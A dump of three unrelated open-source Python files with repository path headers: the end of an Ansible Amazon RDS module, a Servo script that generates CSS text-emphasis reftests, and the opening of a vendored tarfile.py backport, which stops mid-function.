True except RDSException as e: module.fail_json(msg=e.message) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) module.exit_json(changed=changed, instance=resource.get_data()) def validate_parameters(required_vars, valid_vars, module): command = module.params.get('command') for v in required_vars: if not module.params.get(v): module.fail_json(msg="Parameter %s required for %s command" % (v, command)) # map to convert rds module options to boto rds and rds2 options optional_params = { 'port': 'port', 'db_name': 'db_name', 'zone': 'availability_zone', 'maint_window': 'preferred_maintenance_window', 'backup_window': 'preferred_backup_window', 'backup_retention': 'backup_retention_period', 'multi_zone': 'multi_az', 'engine_version': 'engine_version', 'upgrade': 'auto_minor_version_upgrade', 'subnet': 'db_subnet_group_name', 'license_model': 'license_model', 'option_group': 'option_group_name', 'size': 'allocated_storage', 'iops': 'iops', 'new_instance_name': 'new_instance_id', 'apply_immediately': 'apply_immediately', } # map to convert rds module options to boto rds options optional_params_rds = { 'db_engine': 'engine', 'password': 'master_password', 'parameter_group': 'param_group', 'instance_type': 'instance_class', } # map to convert rds module options to boto rds2 options optional_params_rds2 = { 'tags': 'tags', 'publicly_accessible': 'publicly_accessible', 'parameter_group': 'db_parameter_group_name', 'character_set_name': 'character_set_name', 'instance_type': 'db_instance_class', 'password': 'master_user_password', 'new_instance_name': 'new_db_instance_identifier', 'force_failover': 'force_failover', } if has_rds2: optional_params.update(optional_params_rds2) sec_group = 'db_security_groups' else: optional_params.update(optional_params_rds) sec_group = 'security_groups' # Check for options only supported with rds2 for k in set(optional_params_rds2.keys()) - set(optional_params_rds.keys()): if module.params.get(k): module.fail_json(msg="Parameter %s requires boto.rds (boto >= 2.26.0)" % k) params = {} for (k, v) in optional_params.items(): if module.params.get(k) is not None and k not in required_vars: if k in valid_vars: params[v] = module.params[k] else: if module.params.get(k) is False: pass else: module.fail_json(msg="Parameter %s is not valid for %s command" % (k, command)) if module.params.get('security_groups'): params[sec_group] = module.params.get('security_groups').split(',') vpc_groups = module.params.get('vpc_security_groups') if vpc_groups: if has_rds2: params['vpc_security_group_ids'] = vpc_groups else: groups_list = [] for x in vpc_groups: groups_list.append(boto.rds.VPCSecurityGroupMembership(vpc_group=x)) params['vpc_security_groups'] = groups_list # Convert tags dict to list of tuples that rds2 expects if 'tags' in params: params['tags'] = module.params['tags'].items() return params def main(): argument_spec = ec2_argument_spec() argument_spec.update(dict( command=dict(choices=['create', 'replicate', 'delete', 'facts', 'modify', 'promote', 'snapshot', 'reboot', 'restore'], required=True), instance_name=dict(required=False), source_instance=dict(required=False), db_engine=dict(choices=['mariadb', 'MySQL', 'oracle-se1', 'oracle-se2', 'oracle-se', 'oracle-ee', 'sqlserver-ee', 'sqlserver-se', 'sqlserver-ex', 'sqlserver-web', 'postgres', 'aurora'], required=False), size=dict(required=False), instance_type=dict(aliases=['type'], required=False), username=dict(required=False), password=dict(no_log=True, required=False), db_name=dict(required=False), engine_version=dict(required=False), parameter_group=dict(required=False), license_model=dict(choices=['license-included', 'bring-your-own-license', 'general-public-license', 'postgresql-license'], required=False), multi_zone=dict(type='bool', required=False), iops=dict(required=False), security_groups=dict(required=False), vpc_security_groups=dict(type='list', required=False), port=dict(required=False, type='int'), upgrade=dict(type='bool', default=False), option_group=dict(required=False), maint_window=dict(required=False), backup_window=dict(required=False), backup_retention=dict(required=False), zone=dict(aliases=['aws_zone', 'ec2_zone'], required=False), subnet=dict(required=False), wait=dict(type='bool', default=False), wait_timeout=dict(type='int', default=300), snapshot=dict(required=False), apply_immediately=dict(type='bool', default=False), new_instance_name=dict(required=False), tags=dict(type='dict', required=False), publicly_accessible=dict(required=False), character_set_name=dict(required=False), force_failover=dict(type='bool', required=False, default=False) ) ) module = AnsibleModule( argument_spec=argument_spec, ) if not HAS_BOTO: module.fail_json(msg='boto required for this module') invocations = { 'create': create_db_instance, 'replicate': replicate_db_instance, 'delete': delete_db_instance_or_snapshot, 'facts': facts_db_instance_or_snapshot, 'modify': modify_db_instance, 'promote': promote_db_instance, 'snapshot': snapshot_db_instance, 'reboot': reboot_db_instance, 'restore': restore_db_instance, } region, ec2_url, aws_connect_params = get_aws_connection_info(module) if not region: module.fail_json(msg="Region not specified. Unable to determine region from EC2_REGION.") # set port to per db defaults if not specified if module.params['port'] is None and module.params['db_engine'] is not None and module.params['command'] == 'create': if '-' in module.params['db_engine']: engine = module.params['db_engine'].split('-')[0] else: engine = module.params['db_engine'] module.params['port'] = DEFAULT_PORTS[engine.lower()] # connect to the rds endpoint if has_rds2: conn = RDS2Connection(module, region, **aws_connect_params) else: conn = RDSConnection(module, region, **aws_connect_params) invocations[module.params.get('command')](module, conn) # import module snippets from ansible.module_utils.basic import * from ansible.module_utils.ec2 import * if __name__ == '__main__': main()
bd339/servo
refs/heads/master
tests/wpt/web-platform-tests/css/vendor-imports/mozilla/mozilla-central-reftests/text-decor-3/support/generate-text-emphasis-line-height-tests.py
829
#!/usr/bin/env python # - * - coding: UTF-8 - * - """ This script generates tests text-emphasis-line-height-001 ~ 004 except 001z. They test the line height expansion in different directions. This script outputs a list of all tests it generated in the format of Mozilla reftest.list to the stdout. """ from __future__ import unicode_literals TEST_FILE = 'text-emphasis-line-height-{:03}{}.html' TEST_TEMPLATE = '''<!DOCTYPE html> <meta charset="utf-8"> <title>CSS Test: text-emphasis line height, {pos}, {wm}, {tag}</title> <link rel="author" title="Xidorn Quan" href="https://www.upsuper.org"> <link rel="author" title="Mozilla" href="https://www.mozilla.org"> <link rel="help" href="https://drafts.csswg.org/css-text-decor-3/#text-emphasis-position-property"> <meta name="assert" content="text emphasis marks should expand the line height like ruby if necessary"> <link rel="match" href="text-emphasis-line-height-{index:03}-ref.html"> <p>Pass if the emphasis marks are {dir} the black line:</p> {start}試験テスト{end} ''' REF_FILE = 'text-emphasis-line-height-{:03}-ref.html' REF_TEMPLATE='''<!DOCTYPE html> <meta charset="utf-8"> <title>CSS Reference: text-emphasis line height, {pos}</title> <link rel="author" title="Xidorn Quan" href="https://www.upsuper.org"> <link rel="author" title="Mozilla" href="https://www.mozilla.org"> <style> rt {{ font-variant-east-asian: inherit; }} </style> <p>Pass if the emphasis marks are {dir} the black line:</p> <div style="line-height: 1; border-{pos}: 1px solid black; writing-mode: {wm}; ruby-position: {posval}"><ruby>試<rt>&#x25CF;</rt>験<rt>&#x25CF;</rt>テ<rt>&#x25CF;</rt>ス<rt>&#x25CF;</rt>ト<rt>&#x25CF;</rt></ruby></div> ''' STYLE1 = 'line-height: 1; border-{pos}: 1px solid black; ' + \ 'writing-mode: {wm}; text-emphasis-position: {posval};' STYLE2 = 'text-emphasis: circle;' TAGS = [ # (tag, start, end) ('div', '<div style="{style1}{style2}">', '</div>'), ('span', '<div style="{style1}"><span style="{style2}">', '</span></div>'), ] POSITIONS = [ # pos, text-emphasis-position, ruby-position, # writing-modes, dir text ('top', 'over right', 'over', ['horizontal-tb'], 'below'), ('bottom', 'under right', 'under', ['horizontal-tb'], 'over'), ('right', 'over right', 'over', ['vertical-rl', 'vertical-lr'], 'to the left of'), ('left', 'over left', 'under', ['vertical-rl', 'vertical-lr'], 'to the right of'), ] import string def write_file(filename, content): with open(filename, 'wb') as f: f.write(content.encode('UTF-8')) print("# START tests from {}".format(__file__)) idx = 0 for (pos, emphasis_pos, ruby_pos, wms, dir) in POSITIONS: idx += 1 ref_file = REF_FILE.format(idx) content = REF_TEMPLATE.format(pos=pos, dir=dir, wm=wms[0], posval=ruby_pos) write_file(ref_file, content) suffix = iter(string.ascii_lowercase) for wm in wms: style1 = STYLE1.format(pos=pos, wm=wm, posval=emphasis_pos) for (tag, start, end) in TAGS: test_file = TEST_FILE.format(idx, next(suffix)) content = TEST_TEMPLATE.format( pos=pos, wm=wm, tag=tag, index=idx, dir=dir, start=start.format(style1=style1, style2=STYLE2), end=end) write_file(test_file, content) print("== {} {}".format(test_file, ref_file)) print("# END tests from {}".format(__file__))
jjas0nn/solvem
refs/heads/master
tensorflow/lib/python2.7/site-packages/pip/_vendor/distlib/_backport/tarfile.py
422
#------------------------------------------------------------------- # tarfile.py #------------------------------------------------------------------- # Copyright (C) 2002 Lars Gustaebel <lars@gustaebel.de> # All rights reserved. # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, # copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following # conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # from __future__ import print_function """Read from and write to tar format archives. """ __version__ = "$Revision$" version = "0.9.0" __author__ = "Lars Gust\u00e4bel (lars@gustaebel.de)" __date__ = "$Date: 2011-02-25 17:42:01 +0200 (Fri, 25 Feb 2011) $" __cvsid__ = "$Id: tarfile.py 88586 2011-02-25 15:42:01Z marc-andre.lemburg $" __credits__ = "Gustavo Niemeyer, Niels Gust\u00e4bel, Richard Townsend." #--------- # Imports #--------- import sys import os import stat import errno import time import struct import copy import re try: import grp, pwd except ImportError: grp = pwd = None # os.symlink on Windows prior to 6.0 raises NotImplementedError symlink_exception = (AttributeError, NotImplementedError) try: # WindowsError (1314) will be raised if the caller does not hold the # SeCreateSymbolicLinkPrivilege privilege symlink_exception += (WindowsError,) except NameError: pass # from tarfile import * __all__ = ["TarFile", "TarInfo", "is_tarfile", "TarError"] if sys.version_info[0] < 3: import __builtin__ as builtins else: import builtins _open = builtins.open # Since 'open' is TarFile.open #--------------------------------------------------------- # tar constants #--------------------------------------------------------- NUL = b"\0" # the null character BLOCKSIZE = 512 # length of processing blocks RECORDSIZE = BLOCKSIZE * 20 # length of records GNU_MAGIC = b"ustar \0" # magic gnu tar string POSIX_MAGIC = b"ustar\x0000" # magic posix tar string LENGTH_NAME = 100 # maximum length of a filename LENGTH_LINK = 100 # maximum length of a linkname LENGTH_PREFIX = 155 # maximum length of the prefix field REGTYPE = b"0" # regular file AREGTYPE = b"\0" # regular file LNKTYPE = b"1" # link (inside tarfile) SYMTYPE = b"2" # symbolic link CHRTYPE = b"3" # character special device BLKTYPE = b"4" # block special device DIRTYPE = b"5" # directory FIFOTYPE = b"6" # fifo special device CONTTYPE = b"7" # contiguous file GNUTYPE_LONGNAME = b"L" # GNU tar longname GNUTYPE_LONGLINK = b"K" # GNU tar longlink GNUTYPE_SPARSE = b"S" # GNU tar sparse file XHDTYPE = b"x" # POSIX.1-2001 extended header XGLTYPE = b"g" # POSIX.1-2001 global header SOLARIS_XHDTYPE = b"X" # Solaris extended header USTAR_FORMAT = 0 # POSIX.1-1988 (ustar) format GNU_FORMAT = 1 # GNU tar format PAX_FORMAT = 2 # POSIX.1-2001 (pax) format DEFAULT_FORMAT = GNU_FORMAT #--------------------------------------------------------- # tarfile constants #--------------------------------------------------------- # File types that tarfile supports: SUPPORTED_TYPES = (REGTYPE, AREGTYPE, LNKTYPE, SYMTYPE, DIRTYPE, FIFOTYPE, CONTTYPE, CHRTYPE, BLKTYPE, GNUTYPE_LONGNAME, GNUTYPE_LONGLINK, GNUTYPE_SPARSE) # File types that will be treated as a regular file. REGULAR_TYPES = (REGTYPE, AREGTYPE, CONTTYPE, GNUTYPE_SPARSE) # File types that are part of the GNU tar format. GNU_TYPES = (GNUTYPE_LONGNAME, GNUTYPE_LONGLINK, GNUTYPE_SPARSE) # Fields from a pax header that override a TarInfo attribute. PAX_FIELDS = ("path", "linkpath", "size", "mtime", "uid", "gid", "uname", "gname") # Fields from a pax header that are affected by hdrcharset. PAX_NAME_FIELDS = set(("path", "linkpath", "uname", "gname")) # Fields in a pax header that are numbers, all other fields # are treated as strings. PAX_NUMBER_FIELDS = { "atime": float, "ctime": float, "mtime": float, "uid": int, "gid": int, "size": int } #--------------------------------------------------------- # Bits used in the mode field, values in octal. #--------------------------------------------------------- S_IFLNK = 0o120000 # symbolic link S_IFREG = 0o100000 # regular file S_IFBLK = 0o060000 # block device S_IFDIR = 0o040000 # directory S_IFCHR = 0o020000 # character device S_IFIFO = 0o010000 # fifo TSUID = 0o4000 # set UID on execution TSGID = 0o2000 # set GID on execution TSVTX = 0o1000 # reserved TUREAD = 0o400 # read by owner TUWRITE = 0o200 # write by owner TUEXEC = 0o100 # execute/search by owner TGREAD = 0o040 # read by group TGWRITE = 0o020 # write by group TGEXEC = 0o010 # execute/search by group TOREAD = 0o004 # read by other TOWRITE = 0o002 # write by other TOEXEC = 0o001 # execute/search by other #--------------------------------------------------------- # initialization #--------------------------------------------------------- if os.name in ("nt", "ce"): ENCODING = "utf-8" else: ENCODING = sys.getfilesystemencoding() #--------------------------------------------------------- # Some useful functions #--------------------------------------------------------- def stn(s, length, encoding, errors): """Convert a string to a null-terminated bytes object. """ s = s.encode(encoding, errors) return s[:length] + (length - len(s)) * NUL def nts(s, encoding, errors): """Convert a null-terminated bytes object to a string. """ p = s.find(b"\0") if p != -1: s = s[:p] return s.decode(encoding, errors) def nti(s): """Convert a number field to a python number. """ # There are two possible encodings for a number field, see # itn() below. if s[0] != chr(0o200): try: n = int(nts(s, "ascii", "strict") or "0", 8) except ValueError: raise InvalidHeaderError("invalid header") else: n = 0 for i in range(len(s) - 1): n <<= 8 n += ord(s[i + 1]) return n def itn(n, digits=8, format=DEFAULT_FORMAT): """Convert a python number to a number field. """ # POSIX 1003.1-1988 requires numbers to be encoded as a string of # octal digits followed by a null-byte, this allows values up to # (8**(digits-1))-1. GNU tar allows storing numbers greater than # that if necessary. A leading 0o200 byte indicates this particular # encoding, the following digits-1 bytes are a big-endian # representation. This allows values up to (256**(digits-1))-1. if 0 <= n < 8 ** (digits - 1): s = ("%0*o" % (digits - 1, n)).encode("ascii") + NUL else: if format != GNU_FORMAT or n >= 256 ** (digits - 1): raise ValueError("overflow in number field") if n < 0: # XXX We mimic GNU tar's behaviour with negative numbers, # this could raise OverflowError. n = struct.unpack("L", struct.pack("l", n))[0] s = bytearray() for i in range(digits - 1): s.insert(0, n & 0o377) n >>= 8 s.insert(0, 0o200) return s def calc_chksums(buf): """Calculate the checksum for a member's header by summing up all characters except for the chksum field which is treated as if it was filled with spaces. According to the GNU tar sources, some tars (Sun and NeXT) calculate chksum with signed char, which will be different if there are chars in the buffer with the high bit set. So we calculate two checksums, unsigned and signed. """ unsigned_chksum = 256 + sum(struct.unpack("148B", buf[:148]) + struct.unpack("356B", buf[156:512])) signed_chksum = 256 + sum(struct.unpack("148b", buf[:148]) + struct.unpack("356b", buf[156:512])) return unsigned_chksum, signed_chksum def copyfileobj(src, dst, length=None): """Copy length bytes from fileobj src to fileobj dst. If length is None, copy the entire content. """ if length == 0: return if length is None: while True: buf = src.read(16*1024) if not buf: break dst.write(buf) return BUFSIZE = 16 * 1024 blocks, remainder = divmod(length, BUFSIZE) for b in range(blocks): buf = src.read(BUFSIZE) if len(buf) < BUFSIZE: raise IOError("end of file reached") dst.write(buf) if remainder != 0: buf = src.read(remainder) if len(buf) < remainder: raise IOError("end of file reached") dst.write(buf) return filemode_table = ( ((S_IFLNK, "l"), (S_IFREG, "-"), (S_IFBLK, "b"), (S_IFDIR, "d"), (S_IFCHR, "c"), (S_IFIFO, "p")), ((TUREAD, "r"),), ((TUWRITE, "w"),), ((TUEXEC|TSUID, "s"), (TSUID, "S"), (TUEXEC, "x")), ((TGREAD, "r"),), ((TGWRITE, "w"),), ((TGEXEC|TSGID, "s"), (TSGID, "S"), (TGEXEC, "x")), ((TOREAD, "r"),), ((TOWRITE, "w"),), ((TOEXEC|TSVTX, "t"), (TSVTX, "T"), (TOEXEC, "x")) ) def filemode(mode): """Convert a file's mode to a string of the form -rwxrwxrwx. Used by TarFile.list() """ perm = [] for table in filemode_table: for bit, char in table: if mode & bit == bit: perm.append(char) break else: perm.append("-") return "".join(perm) class TarError(Exception): """Base exception.""" pass class ExtractError(TarError): """General exception for extract errors.""" pass class ReadError(TarError): """Exception for unreadable tar archives.""" pass class CompressionError(TarError): """Exception for unavailable compression methods.""" pass class StreamError(TarError): """Exception for unsupported operations on stream-like TarFiles.""" pass class HeaderError(TarError): """Base exception for header errors.""" pass class EmptyHeaderError(HeaderError): """Exception for empty headers.""" pass class TruncatedHeaderError(HeaderError): """Exception for truncated headers.""" pass class EOFHeaderError(HeaderError): """Exception for end of file headers.""" pass class InvalidHeaderError(HeaderError): """Exception for invalid headers.""" pass class SubsequentHeaderError(HeaderError): """Exception for missing and invalid extended headers.""" pass #--------------------------- # internal stream interface #--------------------------- class _LowLevelFile(object): """Low-level file object. Supports reading and writing. It is used instead of a regular file object for streaming access. """ def __init__(self, name, mode): mode = { "r": os.O_RDONLY, "w": os.O_WRONLY | os.O_CREAT | os.O_TRUNC, }[mode] if hasattr(os, "O_BINARY"): mode |= os.O_BINARY self.fd = os.open(name, mode, 0o666) def close(self): os.close(self.fd) def read(self, size): return os.read(self.fd, size) def write(self, s): os.write(self.fd, s) class _Stream(object): """Class that serves as an adapter between TarFile and a stream-like object. The stream-like object only needs to have a read() or write() method and is accessed blockwise. Use of gzip or bzip2 compression is possible. A stream-like object could be for example: sys.stdin, sys.stdout, a socket, a tape device etc. _Stream is intended to be used only internally. """ def __init__(self, name, mode, comptype, fileobj, bufsize): """Construct a _Stream object. """ self._extfileobj = True if fileobj is None: fileobj = _LowLevelFile(name, mode) self._extfileobj = False if comptype == '*': # Enable transparent compression detection for the # stream interface fileobj = _StreamProxy(fileobj) comptype = fileobj.getcomptype() self.name = name or "" self.mode = mode self.comptype = comptype self.fileobj = fileobj self.bufsize = bufsize self.buf = b"" self.pos = 0 self.closed = False try: if comptype == "gz": try: import zlib except ImportError: raise CompressionError("zlib module is not available") self.zlib = zlib self.crc = zlib.crc32(b"") if mode == "r": self._init_read_gz() else: self._init_write_gz() if comptype == "bz2": try: import bz2 except ImportError: raise CompressionError("bz2 module is not available") if mode == "r": self.dbuf = b"" self.cmp = bz2.BZ2Decompressor() else: self.cmp = bz2.BZ2Compressor() except: if not self._extfileobj: self.fileobj.close() self.closed = True raise def __del__(self): if hasattr(self, "closed") and not self.closed: self.close() def _init_write_gz(self): """Initialize for writing with gzip compression. """ self.cmp = self.zlib.compressobj(9, self.zlib.DEFLATED, -self.zlib.MAX_WBITS, self.zlib.DEF_MEM_LEVEL, 0) timestamp = struct.pack("<L", int(time.time())) self.__write(b"\037\213\010\010" + timestamp + b"\002\377") if self.name.endswith(".gz"): self.name = self.name[:-3] # RFC1952 says we must use ISO-8859-1 for the FNAME field. self.__write(self.name.encode("iso-8859-1", "replace") + NUL) def write(self, s): """Write string s to the stream. """ if self.comptype == "gz": self.crc = self.zlib.crc32(s, self.crc) self.pos += len(s) if self.comptype != "tar": s = self.cmp.compress(s) self.__write(s) def __write(self, s): """Write string s to the stream if a whole new block is ready to be written. """ self.buf += s while len(self.buf) > self.bufsize: self.fileobj.write(self.buf[:self.bufsize]) self.buf = self.buf[self.bufsize:] def close(self): """Close the _Stream object. No operation should be done on it afterwards. """ if self.closed: return if self.mode == "w" and self.comptype != "tar": self.buf += self.cmp.flush() if self.mode == "w" and self.buf: self.fileobj.write(self.buf) self.buf = b"" if self.comptype == "gz": # The native zlib crc is an unsigned 32-bit integer, but # the Python wrapper implicitly casts that to a signed C # long. So, on a 32-bit box self.crc may "look negative", # while the same crc on a 64-bit box may "look positive". # To avoid irksome warnings from the `struct` module, force # it to look positive on all boxes. self.fileobj.write(struct.pack("<L", self.crc & 0xffffffff)) self.fileobj.write(struct.pack("<L", self.pos & 0xffffFFFF)) if not self._extfileobj: self.fileobj.close() self.closed = True def _init_read_gz(self): """Initialize for reading a gzip compressed fileobj. """ self.cmp = self.zlib.decompressobj(-self.zlib.MAX_WBITS) self.dbuf = b"" # taken from gzip.GzipFile with some alterations if self.__read(2) != b"\037\213": raise ReadError("not a gzip file") if self.__read(1) != b"\010": raise CompressionError("unsupported compression method") flag = ord(self.__read(1)) self.__read(6) if flag & 4: xlen = ord(self.__read(1)) + 256 * ord(self.__read(1)) self.read(xlen) if flag & 8: while True: s = self.__read(1) if not s or s == NUL: break if flag & 16: while True: s = self.__read(1) if not s or s == NUL: break if flag & 2: self.__read(2) def tell(self): """Return the stream's file pointer position. """ return self.pos def seek(self, pos=0): """Set the stream's file pointer to pos. Negative seeking is forbidden. """ if pos - self.pos >= 0: blocks, remainder = divmod(pos - self.pos, self.bufsize) for i in range(blocks): self.read(self.bufsize) self.read(remainder) else: raise StreamError("seeking backwards is not allowed") return self.pos def read(self, size=None): """Return the next size number of bytes from the stream. If size is not defined, return all bytes of the stream up to EOF. """ if size is None: t = [] while True: buf = self._read(self.bufsize) if not buf: break t.append(buf) buf = "".join(t) else: buf = self._read(size) self.pos += len(buf) return buf def _read(self, size): """Return size bytes from the stream. """ if self.comptype == "tar": return self.__read(size) c = len(self.dbuf) while c < size: buf = self.__read(self.bufsize) if not buf: break try: buf = self.cmp.decompress(buf) except IOError: raise ReadError("invalid compressed data") self.dbuf += buf c += len(buf) buf = self.dbuf[:size] self.dbuf = self.dbuf[size:] return buf def __read(self, size): """Return size bytes from stream. If internal buffer is empty, read another block from the stream. """ c = len(self.buf) while c < size: buf = self.fileobj.read(self.bufsize) if not buf: break self.buf += buf c += len(buf) buf = self.buf[:size] self.buf = self.buf[size:] return buf # class _Stream class _StreamProxy(object): """Small proxy class that enables transparent compression detection for the Stream interface (mode 'r|*'). """ def __init__(self, fileobj): self.fileobj = fileobj self.buf = self.fileobj.read(BLOCKSIZE) def read(self, size): self.read = self.fileobj.read return self.buf def getcomptype(self): if self.buf.startswith(b"\037\213\010"): return "gz" if self.buf.startswith(b"BZh91"): return "bz2" return "tar" def close(self): self.fileobj.close() # class StreamProxy class _BZ2Proxy(object): """Small proxy class that enables external file object support for "r:bz2" and "w:bz2" modes. This is actually a workaround for a limitation in bz2 module's BZ2File class which (unlike gzip.GzipFile) has no support for a file object argument. """ blocksize = 16 * 1024 def __init__(self, fileobj, mode): self.fileobj = fileobj self.mode = mode self.name = getattr(self.fileobj, "name", None) self.init() def init(self): import bz2 self.pos = 0 if self.mode == "r": self.bz2obj = bz2.BZ2Decompressor() self.fileobj.seek(0) self.buf = b"" else: self.bz2obj = bz2.BZ2Compressor() def read(self, size): x = len(self.buf) while x < size: raw = self.fileobj.read(self.blocksize) if not raw: break data = self.bz2obj.decompress(raw) self.buf += data x += len(data) buf = self.buf[:size] self.buf = self.buf[size:] self.pos += len(buf) return buf def seek(self, pos): if pos < self.pos: self.init() self.read(pos - self.pos) def tell(self): return self.pos def write(self, data): self.pos += len(data) raw = self.bz2obj.compress(data) self.fileobj.write(raw) def close(self): if self.mode == "w": raw = self.bz2obj.flush() self.fileobj.write(raw) # class _BZ2Proxy #------------------------ # Extraction file object #------------------------ class _FileInFile(object): """A thin wrapper around an existing file object that provides a part of its data as an individual file object. """ def __init__(self, fileobj, offset, size, blockinfo=None): self.fileobj = fileobj self.offset = offset self.size = size self.position = 0 if blockinfo is None: blockinfo = [(0, size)] # Construct a map with data and zero blocks. self.map_index = 0 self.map = [] lastpos = 0 realpos = self.offset for offset, size in blockinfo: if offset > lastpos: self.map.append((False, lastpos, offset, None)) self.map.append((True, offset, offset + size, realpos)) realpos += size lastpos = offset + size if lastpos < self.size: self.map.append((False, lastpos, self.size, None)) def seekable(self): if not hasattr(self.fileobj, "seekable"): # XXX gzip.GzipFile and bz2.BZ2File return True return self.fileobj.seekable() def tell(self): """Return the current file position. """ return self.position def seek(self, position): """Seek to a position in the file. """ self.position = position def read(self, size=None): """Read data from the file. """ if size is None: size = self.size - self.position else: size = min(size, self.size - self.position) buf = b"" while size > 0: while True: data, start, stop, offset = self.map[self.map_index] if start <= self.position < stop: break else: self.map_index += 1 if self.map_index == len(self.map): self.map_index = 0 length = min(size, stop - self.position) if data: self.fileobj.seek(offset + (self.position - start)) buf += self.fileobj.read(length) else: buf += NUL * length size -= length self.position += length return buf #class _FileInFile class ExFileObject(object): """File-like object for reading an archive member. Is returned by TarFile.extractfile(). """ blocksize = 1024 def __init__(self, tarfile, tarinfo): self.fileobj = _FileInFile(tarfile.fileobj, tarinfo.offset_data, tarinfo.size, tarinfo.sparse) self.name = tarinfo.name self.mode = "r" self.closed = False self.size = tarinfo.size self.position = 0 self.buffer = b"" def readable(self): return True def writable(self): return False def seekable(self): return self.fileobj.seekable() def read(self, size=None): """Read at most size bytes from the file. If size is not present or None, read all data until EOF is reached. """ if self.closed: raise ValueError("I/O operation on closed file") buf = b"" if self.buffer: if size is None: buf = self.buffer self.buffer = b"" else: buf = self.buffer[:size] self.buffer = self.buffer[size:] if size is None: buf += self.fileobj.read() else: buf += self.fileobj.read(size - len(buf)) self.position += len(buf) return buf # XXX TextIOWrapper uses the read1() method. read1 = read def readline(self, size=-1): """Read one entire line from the file. If size is present and non-negative, return a string with at most that size, which may be an incomplete line. """ if self.closed: raise ValueError("I/O operation on closed file") pos = self.buffer.find(b"\n") + 1 if pos == 0: # no newline found. while True: buf = self.fileobj.read(self.blocksize) self.buffer += buf if not buf or b"\n" in buf: pos = self.buffer.find(b"\n") + 1 if pos == 0: # no newline found. pos = len(self.buffer) break if size != -1: pos = min(size, pos) buf = self.buffer[:pos] self.buffer = self.buffer[pos:] self.position += len(buf) return buf def readlines(self): """Return a list with all remaining lines. """ result = [] while True: line = self.readline() if not line: break result.append(line) return result def tell(self): """Return the current file position. """ if self.closed: raise ValueError("I/O operation on closed file") return self.position def seek(self, pos, whence=os.SEEK_SET): """Seek to a position in the file. """ if self.closed: raise ValueError("I/O operation on closed file") if whence == os.SEEK_SET: self.position = min(max(pos, 0), self.size) elif whence == os.SEEK_CUR: if pos < 0: self.position = max(self.position + pos, 0) else: self.position = min(self.position + pos, self.size) elif whence == os.SEEK_END: self.position = max(min(self.size + pos, self.size), 0) else: raise ValueError("Invalid argument") self.buffer = b"" self.fileobj.seek(self.position) def close(self): """Close the file object. """ self.closed = True def __iter__(self): """Get an iterator over the file's lines. """ while True: line = self.readline() if not line: break yield line #class ExFileObject #------------------ # Exported Classes #------------------ class TarInfo(object): """Informational class which holds the details about an archive member given by a tar header block. TarInfo objects are returned by TarFile.getmember(), TarFile.getmembers() and TarFile.gettarinfo() and are usually created internally. """ __slots__ = ("name", "mode", "uid", "gid", "size", "mtime", "chksum", "type", "linkname", "uname", "gname", "devmajor", "devminor", "offset", "offset_data", "pax_headers", "sparse", "tarfile", "_sparse_structs", "_link_target") def __init__(self, name=""): """Construct a TarInfo object. name is the optional name of the member. """ self.name = name # member name self.mode = 0o644 # file permissions self.uid = 0 # user id self.gid = 0 # group id self.size = 0 # file size self.mtime = 0 # modification time self.chksum = 0 # header checksum self.type = REGTYPE # member type self.linkname = "" # link name self.uname = "" # user name self.gname = "" # group name self.devmajor = 0 # device major number self.devminor = 0 # device minor number self.offset = 0 # the tar header starts here self.offset_data = 0 # the file's data starts here self.sparse = None # sparse member information self.pax_headers = {} # pax header information # In pax headers the "name" and "linkname" field are called # "path" and "linkpath". def _getpath(self): return self.name def _setpath(self, name): self.name = name path = property(_getpath, _setpath) def _getlinkpath(self): return self.linkname def _setlinkpath(self, linkname): self.linkname = linkname linkpath = property(_getlinkpath, _setlinkpath) def __repr__(self): return "<%s %r at %#x>" % (self.__class__.__name__,self.name,id(self)) def get_info(self): """Return the TarInfo's attributes as a dictionary. """ info = { "name": self.name, "mode": self.mode & 0o7777, "uid": self.uid, "gid": self.gid, "size": self.size, "mtime": self.mtime, "chksum": self.chksum, "type": self.type, "linkname": self.linkname, "uname": self.uname, "gname": self.gname, "devmajor": self.devmajor, "devminor": self.devminor } if info["type"] == DIRTYPE and not info["name"].endswith("/"): info["name"] += "/" return info def tobuf(self, format=DEFAULT_FORMAT, encoding=ENCODING, errors="surrogateescape"): """Return a tar header as a string of 512 byte blocks. """ info = self.get_info() if format == USTAR_FORMAT: return self.create_ustar_header(info, encoding, errors) elif format == GNU_FORMAT: return self.create_gnu_header(info, encoding, errors) elif format == PAX_FORMAT: return self.create_pax_header(info, encoding) else: raise ValueError("invalid format") def create_ustar_header(self, info, encoding, errors): """Return the object as a ustar header block. """ info["magic"] = POSIX_MAGIC if len(info["linkname"]) > LENGTH_LINK: raise ValueError("linkname is too long") if len(info["name"]) > LENGTH_NAME: info["prefix"], info["name"] = self._posix_split_name(info["name"]) return self._create_header(info, USTAR_FORMAT, encoding, errors) def create_gnu_header(self, info, encoding, errors): """Return the object as a GNU header block sequence. """ info["magic"] = GNU_MAGIC buf = b"" if len(info["linkname"]) > LENGTH_LINK: buf += self._create_gnu_long_header(info["linkname"], GNUTYPE_LONGLINK, encoding, errors) if len(info["name"]) > LENGTH_NAME: buf += self._create_gnu_long_header(info["name"], GNUTYPE_LONGNAME, encoding, errors) return buf + self._create_header(info, GNU_FORMAT, encoding, errors) def create_pax_header(self, info, encoding): """Return the object as a ustar header block. If it cannot be represented this way, prepend a pax extended header sequence with supplement information. """ info["magic"] = POSIX_MAGIC pax_headers = self.pax_headers.copy() # Test string fields for values that exceed the field length or cannot # be represented in ASCII encoding. for name, hname, length in ( ("name", "path", LENGTH_NAME), ("linkname", "linkpath", LENGTH_LINK), ("uname", "uname", 32), ("gname", "gname", 32)): if hname in 